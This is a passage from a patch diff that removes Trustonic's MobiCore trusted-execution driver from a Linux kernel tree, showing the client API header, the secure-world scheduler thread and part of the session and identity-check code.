-- /* The device file of the kernel module could not be opened. */
-- MC_DRV_ERR_INVALID_DEVICE_FILE = 16,
-- /* Invalid parameter. */
-- MC_DRV_ERR_INVALID_PARAMETER = 17,
-- /* Unspecified error from Kernel Module*/
-- MC_DRV_ERR_KERNEL_MODULE = 18,
-- /* Error during mapping of additional bulk memory to session. */
-- MC_DRV_ERR_BULK_MAPPING = 19,
-- /* Error during unmapping of additional bulk memory to session. */
-- MC_DRV_ERR_BULK_UNMAPPING = 20,
-- /* Notification received, exit code available. */
-- MC_DRV_INFO_NOTIFICATION = 21,
-- /* Set up of NWd connection failed. */
-- MC_DRV_ERR_NQ_FAILED = 22,
-- /* Wrong daemon version. */
-- MC_DRV_ERR_DAEMON_VERSION = 23,
-- /* Wrong container version. */
-- MC_DRV_ERR_CONTAINER_VERSION = 24,
-- /* System Trustlet public key is wrong. */
-- MC_DRV_ERR_WRONG_PUBLIC_KEY = 25,
-- /* Wrong container type(s). */
-- MC_DRV_ERR_CONTAINER_TYPE_MISMATCH = 26,
-- /* Container is locked (or not activated).
*/
-- MC_DRV_ERR_CONTAINER_LOCKED = 27,
-- /* SPID is not registered with root container. */
-- MC_DRV_ERR_SP_NO_CHILD = 28,
-- /* UUID is not registered with sp container. */
-- MC_DRV_ERR_TL_NO_CHILD = 29,
-- /* Unwrapping of root container failed. */
-- MC_DRV_ERR_UNWRAP_ROOT_FAILED = 30,
-- /* Unwrapping of service provider container failed. */
-- MC_DRV_ERR_UNWRAP_SP_FAILED = 31,
-- /* Unwrapping of Trustlet container failed. */
-- MC_DRV_ERR_UNWRAP_TRUSTLET_FAILED = 32,
-- /* No device associated with connection. */
-- MC_DRV_ERR_DAEMON_DEVICE_NOT_OPEN = 33,
-- /* TA blob attestation is incorrect. */
-- MC_DRV_ERR_TA_ATTESTATION_ERROR = 34,
-- /* Interrupted system call. */
-- MC_DRV_ERR_INTERRUPTED_BY_SIGNAL = 35,
-- /* Service is blocked and opensession is thus not allowed. */
-- MC_DRV_ERR_SERVICE_BLOCKED = 36,
-- /* Service is locked and opensession is thus not allowed. */
-- MC_DRV_ERR_SERVICE_LOCKED = 37,
-- /* Service was killed by the TEE (due to an administrative command). */
-- MC_DRV_ERR_SERVICE_KILLED = 38,
-- /* All permitted instances to the service are used */
-- MC_DRV_ERR_NO_FREE_INSTANCES = 39,
-- /* TA blob header is incorrect. */
-- MC_DRV_ERR_TA_HEADER_ERROR = 40,
--};
--
--/*
-- * Structure of Session Handle, includes the Session ID and the Device ID the
-- * Session belongs to.
-- * The session handle will be used for session-based MobiCore communication.
-- * It will be passed to calls which address a communication end point in the
-- * MobiCore environment.
-- */
--struct mc_session_handle {
-- uint32_t session_id; /* MobiCore session ID */
-- uint32_t device_id; /* Device ID the session belongs to */
--};
--
--/*
-- * Information structure about additional mapped Bulk buffer between the
-- * Trustlet Connector (NWd) and the Trustlet (SWd). This structure is
-- * initialized from a Trustlet Connector by calling mc_map().
-- * In order to use the memory within a Trustlet the Trustlet Connector has to
-- * inform the Trustlet with the content of this structure via the TCI.
-- */
--struct mc_bulk_map {
-- /* The virtual address of the Bulk buffer regarding the address space
-- * of the Trustlet, already includes a possible offset! */
-- uint32_t secure_virt_addr;
-- uint32_t secure_virt_len; /* Length of the mapped Bulk buffer */
--};
--
--/* The default device ID */
--#define MC_DEVICE_ID_DEFAULT 0
--/* Wait infinite for a response of the MC. */
--#define MC_INFINITE_TIMEOUT ((int32_t)(-1))
--/* Do not wait for a response of the MC. */
--#define MC_NO_TIMEOUT 0
--/* TCI/DCI must not exceed 1MiB */
--#define MC_MAX_TCI_LEN 0x100000
--
--/**
-- * mc_open_device() - Open a new connection to a MobiCore device.
-- * @device_id: Identifier for the MobiCore device to be used.
-- * MC_DEVICE_ID_DEFAULT refers to the default device.
-- *
-- * Initializes all device specific resources required to communicate with a
-- * MobiCore instance located on the specified device in the system. If the
-- * device does not exist the function will return MC_DRV_ERR_UNKNOWN_DEVICE.
-- *
-- * Return codes:
-- * MC_DRV_OK: operation completed successfully
-- * MC_DRV_ERR_INVALID_OPERATION: device already opened
-- * MC_DRV_ERR_DAEMON_UNREACHABLE: problems with daemon
-- * MC_DRV_ERR_UNKNOWN_DEVICE: device_id unknown
-- * MC_DRV_ERR_INVALID_DEVICE_FILE: kernel module under /dev/mobicore
-- * cannot be opened
-- */
--__MC_CLIENT_LIB_API enum mc_result mc_open_device(uint32_t device_id);
--
--/**
-- * mc_close_device() - Close the connection to a MobiCore device.
-- * @device_id: Identifier for the MobiCore device.
-- *
-- * When closing a device, active sessions have to be closed beforehand.
-- * Resources associated with the device will be released.
-- * The device may be opened again after it has been closed.
-- *
-- * MC_DEVICE_ID_DEFAULT refers to the default device.
-- *
-- * Return codes:
-- * MC_DRV_OK: operation completed successfully
-- * MC_DRV_ERR_UNKNOWN_DEVICE: device id is invalid
-- * MC_DRV_ERR_SESSION_PENDING: a session is still open
-- * MC_DRV_ERR_DAEMON_UNREACHABLE: problems with daemon occur
-- */
--__MC_CLIENT_LIB_API enum mc_result mc_close_device(uint32_t device_id);
--
--/**
-- * mc_open_session() - Open a new session to a Trustlet.
-- * @session: On success, the session data will be returned
-- * @uuid: UUID of the Trustlet to be opened
-- * @tci: TCI buffer for communicating with the Trustlet
-- * @tci_len: Length of the TCI buffer. Maximum allowed value
-- * is MC_MAX_TCI_LEN
-- *
-- * The Trustlet with the given UUID has to be available in the flash filesystem.
-- *
-- * Write MCP open message to buffer and notify MobiCore about the availability
-- * of a new command.
-- *
-- * Waits till the MobiCore responses with the new session ID (stored in the MCP
-- * buffer).
-- *
-- * Note that session.device_id has to be the device id of an opened device.
-- *
-- * Return codes:
-- * MC_DRV_OK: operation completed successfully
-- * MC_DRV_INVALID_PARAMETER: session parameter is invalid
-- * MC_DRV_ERR_UNKNOWN_DEVICE: device id is invalid
-- * MC_DRV_ERR_DAEMON_UNREACHABLE: problems with daemon socket occur
-- * MC_DRV_ERR_NQ_FAILED: daemon returns an error
-- */
--__MC_CLIENT_LIB_API enum mc_result mc_open_session(
-- struct mc_session_handle *session, const struct mc_uuid_t *uuid,
-- uint8_t *tci, uint32_t tci_len);
--
--/**
-- * mc_open_trustlet() - Open a new session to the provided Trustlet.
-- * @session: On success, the session data will be returned
-- * @spid: Service Provider ID (for SP trustlets otherwise ignored)
-- * @trustlet Memory buffer containing the Trusted Application binary
-- * @trustlet_len Trusted Application length
-- * @tci: TCI buffer for communicating with the Trustlet
-- * @tci_len: Length of the TCI buffer.
Maximum allowed value
-- * is MC_MAX_TCI_LEN
-- *
-- * Write MCP open message to buffer and notify MobiCore about the availability
-- * of a new command.
-- *
-- * Waits till the MobiCore responses with the new session ID (stored in the MCP
-- * buffer).
-- *
-- * Note that session.device_id has to be the device id of an opened device.
-- *
-- * Return codes:
-- * MC_DRV_OK: operation completed successfully
-- * MC_DRV_INVALID_PARAMETER: session parameter is invalid
-- * MC_DRV_ERR_UNKNOWN_DEVICE: device id is invalid
-- * MC_DRV_ERR_DAEMON_UNREACHABLE: problems with daemon socket occur
-- * MC_DRV_ERR_NQ_FAILED: daemon returns an error
-- */
--__MC_CLIENT_LIB_API enum mc_result mc_open_trustlet(
-- struct mc_session_handle *session, uint32_t spid,
-- uint8_t *trustlet, uint32_t trustlet_len, uint8_t *tci, uint32_t len);
--
--/**
-- * mc_close_session() - Close a Trustlet session.
-- * @session: Session to be closed.
-- *
-- * Closes the specified MobiCore session. The call will block until the
-- * session has been closed.
-- *
-- * Device device_id has to be opened in advance.
-- *
-- * Return codes:
-- * MC_DRV_OK: operation completed successfully
-- * MC_DRV_INVALID_PARAMETER: session parameter is invalid
-- * MC_DRV_ERR_UNKNOWN_SESSION: session id is invalid
-- * MC_DRV_ERR_UNKNOWN_DEVICE: device id of session is invalid
-- * MC_DRV_ERR_DAEMON_UNREACHABLE: problems with daemon occur
-- * MC_DRV_ERR_INVALID_DEVICE_FILE: daemon cannot open Trustlet file
-- */
--__MC_CLIENT_LIB_API enum mc_result mc_close_session(
-- struct mc_session_handle *session);
--
--/**
-- * mc_notify() - Notify a session.
-- * @session: The session to be notified.
-- *
-- * Notifies the session end point about available message data.
-- * If the session parameter is correct, notify will always succeed.
-- * Corresponding errors can only be received by mc_wait_notification().
-- *
-- * A session has to be opened in advance.
-- *
-- * Return codes:
-- * MC_DRV_OK: operation completed successfully
-- * MC_DRV_INVALID_PARAMETER: session parameter is invalid
-- * MC_DRV_ERR_UNKNOWN_SESSION: session id is invalid
-- * MC_DRV_ERR_UNKNOWN_DEVICE: device id of session is invalid
-- */
--__MC_CLIENT_LIB_API enum mc_result mc_notify(struct mc_session_handle *session);
--
--/**
-- * mc_wait_notification() - Wait for a notification.
-- * @session: The session the notification should correspond to.
-- * @timeout: Time in milliseconds to wait
-- * (MC_NO_TIMEOUT : direct return, > 0 : milliseconds,
-- * MC_INFINITE_TIMEOUT : wait infinitely)
-- *
-- * Wait for a notification issued by the MobiCore for a specific session.
-- * The timeout parameter specifies the number of milliseconds the call will wait
-- * for a notification.
-- *
-- * If the caller passes 0 as timeout value the call will immediately return.
-- * If timeout value is below 0 the call will block until a notification for the
-- * session has been received.
-- *
-- * If timeout is below 0, call will block.
-- *
-- * Caller has to trust the other side to send a notification to wake him up
-- * again.
-- *
-- * Return codes:
-- * MC_DRV_OK: operation completed successfully
-- * MC_DRV_ERR_TIMEOUT: no notification arrived in time
-- * MC_DRV_INFO_NOTIFICATION: a problem with the session was
-- * encountered. Get more details with
-- * mc_get_session_error_code()
-- * MC_DRV_ERR_NOTIFICATION: a problem with the socket occurred
-- * MC_DRV_INVALID_PARAMETER: a parameter is invalid
-- * MC_DRV_ERR_UNKNOWN_SESSION: session id is invalid
-- * MC_DRV_ERR_UNKNOWN_DEVICE: device id of session is invalid
-- */
--__MC_CLIENT_LIB_API enum mc_result mc_wait_notification(
-- struct mc_session_handle *session, int32_t timeout);
--
--/**
-- * mc_malloc_wsm() - Allocate a block of world shared memory (WSM).
-- * @device_id: The ID of an opened device to retrieve the WSM from.
-- * @align: The alignment (number of pages) of the memory block
-- * (e.g.
0x00000001 for 4kb).
-- * @len: Length of the block in bytes.
-- * @wsm: Virtual address of the world shared memory block.
-- * @wsm_flags: Platform specific flags describing the memory to
-- * be allocated.
-- *
-- * The MC driver allocates a contiguous block of memory which can be used as
-- * WSM.
-- * This implicates that the allocated memory is aligned according to the
-- * alignment parameter.
-- *
-- * Always returns a buffer of size WSM_SIZE aligned to 4K.
-- *
-- * Align and wsm_flags are currently ignored
-- *
-- * Return codes:
-- * MC_DRV_OK: operation completed successfully
-- * MC_DRV_INVALID_PARAMETER: a parameter is invalid
-- * MC_DRV_ERR_UNKNOWN_DEVICE: device id is invalid
-- * MC_DRV_ERR_NO_FREE_MEMORY: no more contiguous memory is
-- * available in this size or for this
-- * process
-- */
--__MC_CLIENT_LIB_API enum mc_result mc_malloc_wsm(
-- uint32_t device_id,
-- uint32_t align,
-- uint32_t len,
-- uint8_t **wsm,
-- uint32_t wsm_flags
--);
--
--/**
-- * mc_free_wsm() - Free a block of world shared memory (WSM).
-- * @device_id: The ID to which the given address belongs
-- * @wsm: Address of WSM block to be freed
-- *
-- * The MC driver will free a block of world shared memory (WSM) previously
-- * allocated with mc_malloc_wsm(). The caller has to assure that the address
-- * handed over to the driver is a valid WSM address.
-- *
-- * Return codes:
-- * MC_DRV_OK: operation completed successfully
-- * MC_DRV_INVALID_PARAMETER: a parameter is invalid
-- * MC_DRV_ERR_UNKNOWN_DEVICE: when device id is invalid
-- * MC_DRV_ERR_FREE_MEMORY_FAILED: on failure
-- */
--__MC_CLIENT_LIB_API enum mc_result mc_free_wsm(uint32_t device_id,
-- uint8_t *wsm);
--
--/**
-- *mc_map() - Map additional bulk buffer between a Trustlet Connector (TLC)
-- * and the Trustlet (TL) for a session
-- * @session: Session handle with information of the device_id and
-- * the session_id.
The given buffer is mapped to the -- * session specified in the sessionHandle -- * @buf: Virtual address of a memory portion (relative to TLC) -- * to be shared with the Trustlet, already includes a -- * possible offset! -- * @len: length of buffer block in bytes. -- * @map_info: Information structure about the mapped Bulk buffer -- * between the TLC (NWd) and the TL (SWd). -- * -- * Memory allocated in user space of the TLC can be mapped as additional -- * communication channel (besides TCI) to the Trustlet. Limitation of the -- * Trustlet memory structure apply: only 6 chunks can be mapped with a maximum -- * chunk size of 1 MiB each. -- * -- * It is up to the application layer (TLC) to inform the Trustlet -- * about the additional mapped bulk memory. -- * -- * Return codes: -- * MC_DRV_OK: operation completed successfully -- * MC_DRV_INVALID_PARAMETER: a parameter is invalid -- * MC_DRV_ERR_UNKNOWN_SESSION: session id is invalid -- * MC_DRV_ERR_UNKNOWN_DEVICE: device id of session is invalid -- * MC_DRV_ERR_DAEMON_UNREACHABLE: problems with daemon occur -- * MC_DRV_ERR_BULK_MAPPING: buf is already uses as bulk buffer or -- * when registering the buffer failed -- */ --__MC_CLIENT_LIB_API enum mc_result mc_map( -- struct mc_session_handle *session, void *buf, uint32_t len, -- struct mc_bulk_map *map_info); -- --/** -- * mc_unmap() - Remove additional mapped bulk buffer between Trustlet Connector -- * (TLC) and the Trustlet (TL) for a session -- * @session: Session handle with information of the device_id and -- * the session_id. The given buffer is unmapped from the -- * session specified in the sessionHandle. -- * @buf: Virtual address of a memory portion (relative to TLC) -- * shared with the TL, already includes a possible offset! -- * @map_info: Information structure about the mapped Bulk buffer -- * between the TLC (NWd) and the TL (SWd) -- * -- * The bulk buffer will immediately be unmapped from the session context. 
-- * -- * The application layer (TLC) must inform the TL about unmapping of the -- * additional bulk memory before calling mc_unmap! -- * -- * The clientlib currently ignores the len field in map_info. -- * -- * Return codes: -- * MC_DRV_OK: operation completed successfully -- * MC_DRV_INVALID_PARAMETER: a parameter is invalid -- * MC_DRV_ERR_UNKNOWN_SESSION: session id is invalid -- * MC_DRV_ERR_UNKNOWN_DEVICE: device id of session is invalid -- * MC_DRV_ERR_DAEMON_UNREACHABLE: problems with daemon occur -- * MC_DRV_ERR_BULK_UNMAPPING: buf was not registered earlier -- * or when unregistering failed -- */ --__MC_CLIENT_LIB_API enum mc_result mc_unmap( -- struct mc_session_handle *session, void *buf, -- struct mc_bulk_map *map_info); -- --/* -- * mc_get_session_error_code() - Get additional error information of the last -- * error that occurred on a session. -- * @session: Session handle with information of the device_id and -- * the session_id -- * @exit_code: >0 Trustlet has terminated itself with this value, -- * <0 Trustlet is dead because of an error within the -- * MobiCore (e.g. Kernel exception). See also MCI -- * definition. -- * -- * After the request the stored error code will be deleted. -- * -- * Return codes: -- * MC_DRV_OK: operation completed successfully -- * MC_DRV_INVALID_PARAMETER: a parameter is invalid -- * MC_DRV_ERR_UNKNOWN_SESSION: session id is invalid -- * MC_DRV_ERR_UNKNOWN_DEVICE: device id of session is invalid -- */ --__MC_CLIENT_LIB_API enum mc_result mc_get_session_error_code( -- struct mc_session_handle *session, int32_t *exit_code); -- --#endif /* _MOBICORE_DRIVER_API_H_ */ -diff --git a/drivers/gud/MobiCoreDriver/scheduler.c b/drivers/gud/MobiCoreDriver/scheduler.c -deleted file mode 100644 -index 444f839d8ad1d..0000000000000 ---- a/drivers/gud/MobiCoreDriver/scheduler.c -+++ /dev/null -@@ -1,231 +0,0 @@ --/* -- * Copyright (c) 2013-2015 TRUSTONIC LIMITED -- * All Rights Reserved. 
-- * -- * This program is free software; you can redistribute it and/or -- * modify it under the terms of the GNU General Public License -- * version 2 as published by the Free Software Foundation. -- * -- * This program is distributed in the hope that it will be useful, -- * but WITHOUT ANY WARRANTY; without even the implied warranty of -- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -- * GNU General Public License for more details. -- */ -- --#include --#include --#include --#include --#include --#include --#include -- --#include "public/mc_linux.h" -- --#include "main.h" --#include "fastcall.h" --#include "debug.h" --#include "logging.h" --#include "mcp.h" --#include "scheduler.h" -- --#define SCHEDULING_FREQ 5 /**< N-SIQ every n-th time */ -- --static struct sched_ctx { -- struct task_struct *thread; -- bool thread_run; -- struct completion idle_complete; /* Unblock scheduler thread */ -- struct completion sleep_complete; /* Wait for sleep status */ -- struct mutex sleep_mutex; /* Protect sleep request */ -- struct mutex request_mutex; /* Protect all below */ -- /* The order of this enum matters */ -- enum { -- NONE, /* No specific request */ -- YIELD, /* Run the SWd */ -- NSIQ, /* Schedule the SWd */ -- SUSPEND, /* Suspend the SWd */ -- RESUME, /* Resume the SWd */ -- } request; -- bool suspended; --} sched_ctx; -- --static int mc_scheduler_command(int command) --{ -- if (IS_ERR_OR_NULL(sched_ctx.thread)) -- return -EFAULT; -- -- mutex_lock(&sched_ctx.request_mutex); -- if (sched_ctx.request < command) { -- sched_ctx.request = command; -- complete(&sched_ctx.idle_complete); -- } -- -- mutex_unlock(&sched_ctx.request_mutex); -- return 0; --} -- --static int mc_scheduler_pm_command(int command) --{ -- int ret = -EPERM; -- -- if (IS_ERR_OR_NULL(sched_ctx.thread)) -- return -EFAULT; -- -- mutex_lock(&sched_ctx.sleep_mutex); -- -- /* Send request */ -- mc_scheduler_command(command); -- -- /* Wait for scheduler to reply */ -- 
wait_for_completion(&sched_ctx.sleep_complete); -- mutex_lock(&sched_ctx.request_mutex); -- if (command == SUSPEND) { -- if (sched_ctx.suspended) -- ret = 0; -- } else { -- if (!sched_ctx.suspended) -- ret = 0; -- } -- -- mutex_unlock(&sched_ctx.request_mutex); -- -- mutex_unlock(&sched_ctx.sleep_mutex); -- return ret; --} -- --static int mc_dev_command(enum mcp_scheduler_commands command) --{ -- switch (command) { -- case MCP_YIELD: -- return mc_scheduler_command(YIELD); -- case MCP_NSIQ: -- return mc_scheduler_command(NSIQ); -- } -- -- return -EINVAL; --} -- --int mc_scheduler_suspend(void) --{ -- return mc_scheduler_pm_command(SUSPEND); --} -- --int mc_scheduler_resume(void) --{ -- return mc_scheduler_pm_command(RESUME); --} -- --/* -- * This thread, and only this thread, schedules the SWd. Hence, reading the idle -- * status and its associated timeout is safe from race conditions. -- */ --static int tee_scheduler(void *arg) --{ -- int timeslice = 0; /* Actually scheduling period */ -- int ret = 0; -- -- MCDRV_DBG("enter"); -- while (1) { -- int32_t timeout_ms = -1; -- bool pm_request = false; -- -- if (sched_ctx.suspended || mcp_get_idle_timeout(&timeout_ms)) { -- /* If timeout is 0 we keep scheduling the SWd */ -- if (!timeout_ms) -- mc_scheduler_command(NSIQ); -- else if (timeout_ms < 0) -- wait_for_completion(&sched_ctx.idle_complete); -- else if (!wait_for_completion_timeout( -- &sched_ctx.idle_complete, -- msecs_to_jiffies(timeout_ms))) -- /* Timed out, force SWd schedule */ -- mc_scheduler_command(NSIQ); -- } -- -- if (kthread_should_stop() || !sched_ctx.thread_run) -- break; -- -- /* Get requested command if any */ -- mutex_lock(&sched_ctx.request_mutex); -- if (sched_ctx.request == YIELD) -- /* Yield forced: increment timeslice */ -- timeslice++; -- else if (sched_ctx.request >= NSIQ) { -- /* Force N_SIQ, also to suspend/resume SWd */ -- timeslice = 0; -- if (sched_ctx.request == SUSPEND) { -- mcp_suspend(); -- pm_request = true; -- } else if 
(sched_ctx.request == RESUME) { -- mcp_resume(); -- pm_request = true; -- } -- } -- -- sched_ctx.request = NONE; -- mutex_unlock(&sched_ctx.request_mutex); -- -- /* Reset timeout so we don't loop if SWd halted */ -- mcp_reset_idle_timeout(); -- if (timeslice--) { -- /* Resume SWd from where it was */ -- ret = mc_fc_yield(); -- } else { -- timeslice = SCHEDULING_FREQ; -- /* Call SWd scheduler */ -- ret = mc_fc_nsiq(); -- } -- -- /* Always flush log buffer after the SWd has run */ -- mc_logging_run(); -- if (ret) -- break; -- -- /* Should have suspended by now if requested */ -- mutex_lock(&sched_ctx.request_mutex); -- if (pm_request) { -- sched_ctx.suspended = mcp_suspended(); -- complete(&sched_ctx.sleep_complete); -- } -- -- mutex_unlock(&sched_ctx.request_mutex); -- -- /* Flush pending notifications if possible */ -- if (mcp_notifications_flush()) -- complete(&sched_ctx.idle_complete); -- } -- -- MCDRV_DBG("exit, ret is %d", ret); -- return ret; --} -- --int mc_scheduler_start(void) --{ -- sched_ctx.thread_run = true; -- sched_ctx.thread = kthread_run(tee_scheduler, NULL, "tee_scheduler"); -- if (IS_ERR(sched_ctx.thread)) { -- MCDRV_ERROR("tee_scheduler thread creation failed"); -- return PTR_ERR(sched_ctx.thread); -- } -- -- mcp_register_scheduler(mc_dev_command); -- complete(&sched_ctx.idle_complete); -- return 0; --} -- --void mc_scheduler_stop(void) --{ -- mcp_register_scheduler(NULL); -- sched_ctx.thread_run = false; -- complete(&sched_ctx.idle_complete); -- kthread_stop(sched_ctx.thread); --} -- --int mc_scheduler_init(void) --{ -- init_completion(&sched_ctx.idle_complete); -- init_completion(&sched_ctx.sleep_complete); -- mutex_init(&sched_ctx.sleep_mutex); -- mutex_init(&sched_ctx.request_mutex); -- return 0; --} -diff --git a/drivers/gud/MobiCoreDriver/scheduler.h b/drivers/gud/MobiCoreDriver/scheduler.h -deleted file mode 100644 -index c3c17f1c9017c..0000000000000 ---- a/drivers/gud/MobiCoreDriver/scheduler.h -+++ /dev/null -@@ -1,25 +0,0 @@ --/* -- * 
Copyright (c) 2013-2015 TRUSTONIC LIMITED -- * All Rights Reserved. -- * -- * This program is free software; you can redistribute it and/or -- * modify it under the terms of the GNU General Public License -- * version 2 as published by the Free Software Foundation. -- * -- * This program is distributed in the hope that it will be useful, -- * but WITHOUT ANY WARRANTY; without even the implied warranty of -- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -- * GNU General Public License for more details. -- */ -- --#ifndef __MC_SCHEDULER_H__ --#define __MC_SCHEDULER_H__ -- --int mc_scheduler_init(void); --static inline void mc_scheduler_exit(void) {} --int mc_scheduler_start(void); --void mc_scheduler_stop(void); --int mc_scheduler_suspend(void); --int mc_scheduler_resume(void); -- --#endif /* __MC_SCHEDULER_H__ */ -diff --git a/drivers/gud/MobiCoreDriver/session.c b/drivers/gud/MobiCoreDriver/session.c -deleted file mode 100644 -index 1dbb8900b2b3a..0000000000000 ---- a/drivers/gud/MobiCoreDriver/session.c -+++ /dev/null -@@ -1,779 +0,0 @@ --/* -- * Copyright (c) 2013-2015 TRUSTONIC LIMITED -- * All Rights Reserved. -- * -- * This program is free software; you can redistribute it and/or -- * modify it under the terms of the GNU General Public License -- * version 2 as published by the Free Software Foundation. -- * -- * This program is distributed in the hope that it will be useful, -- * but WITHOUT ANY WARRANTY; without even the implied warranty of -- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -- * GNU General Public License for more details. 
-- */ --#include --#include --#include --#include --#include --#include --#include --#include --#include --#include --#include -- --#include "public/mc_linux.h" --#include "public/mc_admin.h" -- --#include "platform.h" /* MC_UIDGID_OLDSTYLE */ --#include "main.h" --#include "debug.h" --#include "mmu.h" --#include "mcp.h" --#include "client.h" /* *cbuf* */ --#include "session.h" --#include "mci/mcimcp.h" -- --#define SHA1_HASH_SIZE 20 -- --struct tbase_wsm { -- /* Buffer NWd addr (uva or kva, used only for lookup) */ -- uintptr_t va; -- /* buffer length */ -- uint32_t len; -- /* Buffer SWd addr */ -- uint32_t sva; -- /* mmu L2 table */ -- struct tbase_mmu *mmu; -- /* possibly a pointer to a cbuf */ -- struct tbase_cbuf *cbuf; -- /* list node */ -- struct list_head list; --}; -- --/* -- * Postponed closing for GP TAs. -- * Implemented as a worker because cannot be executed from within isr_worker. -- */ --static void session_close_worker(struct work_struct *work) --{ -- struct mcp_session *mcp_session; -- struct tbase_session *session; -- -- mcp_session = container_of(work, struct mcp_session, close_work); -- session = container_of(mcp_session, struct tbase_session, mcp_session); -- session_close(session); --} -- --/* Forward declarations */ --static struct tbase_wsm *wsm_create(struct tbase_session *session, -- uintptr_t buf, uint32_t len); --static void wsm_free(struct tbase_wsm *wsm); -- --static int hash_path_and_data(char *hash, const void *data, -- unsigned int data_len) --{ -- struct mm_struct *mm = current->mm; -- struct hash_desc desc; -- struct scatterlist sg; -- char *buf; -- char *path; -- unsigned int path_len; -- int ret = 0; -- -- buf = (char *)__get_free_page(GFP_KERNEL); -- if (!buf) -- return -ENOMEM; -- -- down_read(&mm->mmap_sem); -- if (!mm->exe_file) { -- ret = -ENOENT; -- goto end; -- } -- -- path = d_path(&mm->exe_file->f_path, buf, PAGE_SIZE); -- if (IS_ERR(path)) { -- ret = PTR_ERR(path); -- goto end; -- } -- -- MCDRV_DBG("current process 
path = "); -- { -- char *c; -- -- for (c = path; *c; c++) -- MCDRV_DBG("%c %d", *c, *c); -- } -- -- path_len = strnlen(path, PAGE_SIZE); -- MCDRV_DBG("path_len = %u", path_len); -- desc.tfm = crypto_alloc_hash("sha1", 0, CRYPTO_ALG_ASYNC); -- if (IS_ERR(desc.tfm)) { -- ret = PTR_ERR(desc.tfm); -- MCDRV_DBG("could not alloc hash = %d", ret); -- goto end; -- } -- -- desc.flags = 0; -- sg_init_one(&sg, path, path_len); -- crypto_hash_init(&desc); -- crypto_hash_update(&desc, &sg, path_len); -- if (data) { -- MCDRV_DBG("current process path: hashing additional data\n"); -- sg_init_one(&sg, data, data_len); -- crypto_hash_update(&desc, &sg, data_len); -- } -- -- crypto_hash_final(&desc, hash); -- crypto_free_hash(desc.tfm); -- --end: -- up_read(&mm->mmap_sem); -- free_page((unsigned long)buf); -- -- return ret; --} -- --static int check_prepare_identity(const struct mc_identity *identity, -- struct identity *mcp_identity) --{ -- struct mc_identity *mcp_id = (struct mc_identity *)mcp_identity; -- uint8_t hash[SHA1_HASH_SIZE]; -- bool application = false; -- const void *data; -- unsigned int data_len; -- -- /* Mobicore doesn't support GP client authentication. */ -- if (!g_ctx.f_client_login && -- (identity->login_type != TEEC_LOGIN_PUBLIC)) { -- MCDRV_DBG_WARN("Unsupported login type %d", -- identity->login_type); -- return -EINVAL; -- } -- -- /* Copy login type */ -- mcp_identity->login_type = identity->login_type; -- -- /* Fill in uid field */ -- if ((identity->login_type == TEEC_LOGIN_USER) || -- (identity->login_type == TEEC_LOGIN_USER_APPLICATION)) { -- /* Set euid and ruid of the process. 
*/ --#if !defined(KUIDT_INIT) || defined(MC_UIDGID_OLDSTYLE) -- mcp_id->uid.euid = current_euid(); -- mcp_id->uid.ruid = current_uid(); --#else -- mcp_id->uid.euid = current_euid().val; -- mcp_id->uid.ruid = current_uid().val; --#endif -- } -- -- /* Check gid field */ -- if ((identity->login_type == TEEC_LOGIN_GROUP) || -- (identity->login_type == TEEC_LOGIN_GROUP_APPLICATION)) { --#if !defined(KUIDT_INIT) || defined(MC_UIDGID_OLDSTYLE) -- gid_t gid = identity->gid; --#else -- kgid_t gid = { -- .val = identity->gid, -- }; --#endif -- /* Check if gid is one of: egid of the process, its rgid or one -- * of its supplementary groups */ -- if (!in_egroup_p(gid) && !in_group_p(gid)) { -- MCDRV_DBG("group %d not allowed", identity->gid); -- return -EACCES; -- } -- -- MCDRV_DBG("group %d found", identity->gid); -- mcp_id->gid = identity->gid; -- } -- -- switch (identity->login_type) { -- case TEEC_LOGIN_PUBLIC: -- case TEEC_LOGIN_USER: -- case TEEC_LOGIN_GROUP: -- break; -- case TEEC_LOGIN_APPLICATION: -- application = true; -- data = NULL; -- data_len = 0; -- break; -- case TEEC_LOGIN_USER_APPLICATION: -- application = true; -- data = &mcp_id->uid; -- data_len = sizeof(mcp_id->uid); -- break; -- case TEEC_LOGIN_GROUP_APPLICATION: -- application = true; -- data = &identity->gid; -- data_len = sizeof(identity->gid); -- break; -- default: -- /* Any other login_type value is invalid. */ -- MCDRV_DBG_WARN("Invalid login type"); -- return -EINVAL; -- } -- -- if (application) { -- if (hash_path_and_data(hash, data, data_len)) { -- MCDRV_DBG("error in hash calculation"); -- return -EAGAIN; -- } -- -- memcpy(&mcp_id->login_data, hash, sizeof(mcp_id->login_data)); -- } -- -- return 0; --} -- --/* -- * Create a session object. -- * Note: object is not attached to client yet. 
-- */ --struct tbase_session *session_create(struct tbase_client *client, bool is_gp, -- struct mc_identity *identity) --{ -- struct tbase_session *session; -- struct identity mcp_identity; -- -- if (is_gp) { -- /* Check identity method and data. */ -- int ret = check_prepare_identity(identity, &mcp_identity); -- -- if (ret) -- return ERR_PTR(ret); -- } -- -- /* Allocate session object */ -- session = kzalloc(sizeof(*session), GFP_KERNEL); -- if (!session) -- return ERR_PTR(-ENOMEM); -- -- mutex_init(&session->close_lock); -- /* Initialise object members */ -- mcp_session_init(&session->mcp_session, is_gp, &mcp_identity); -- INIT_WORK(&session->mcp_session.close_work, session_close_worker); -- session->client = client; -- kref_init(&session->kref); -- INIT_LIST_HEAD(&session->list); -- mutex_init(&session->wsms_lock); -- INIT_LIST_HEAD(&session->wsms); -- MCDRV_DBG("created session %p: client %p", session, session->client); -- return session; --} -- --int session_open(struct tbase_session *session, const struct tbase_object *obj, -- const struct tbase_mmu *obj_mmu, uintptr_t tci, size_t len) --{ -- struct mcp_buffer_map map; -- -- tbase_mmu_buffer(obj_mmu, &map); -- /* Create wsm object for tci */ -- if (tci && len) { -- struct tbase_wsm *wsm; -- struct mcp_buffer_map tci_map; -- int ret = 0; -- -- mutex_lock(&session->wsms_lock); -- wsm = wsm_create(session, tci, len); -- if (IS_ERR(wsm)) -- ret = PTR_ERR(wsm); -- -- mutex_unlock(&session->wsms_lock); -- if (ret) -- return ret; -- -- tbase_mmu_buffer(wsm->mmu, &tci_map); -- ret = mcp_open_session(&session->mcp_session, obj, &map, -- &tci_map); -- if (ret) { -- mutex_lock(&session->wsms_lock); -- wsm_free(wsm); -- mutex_unlock(&session->wsms_lock); -- } -- -- return ret; -- } -- -- if (tci || len) { -- MCDRV_ERROR("Tci pointer and length are incoherent"); -- return -EINVAL; -- } -- -- return mcp_open_session(&session->mcp_session, obj, &map, NULL); --} -- 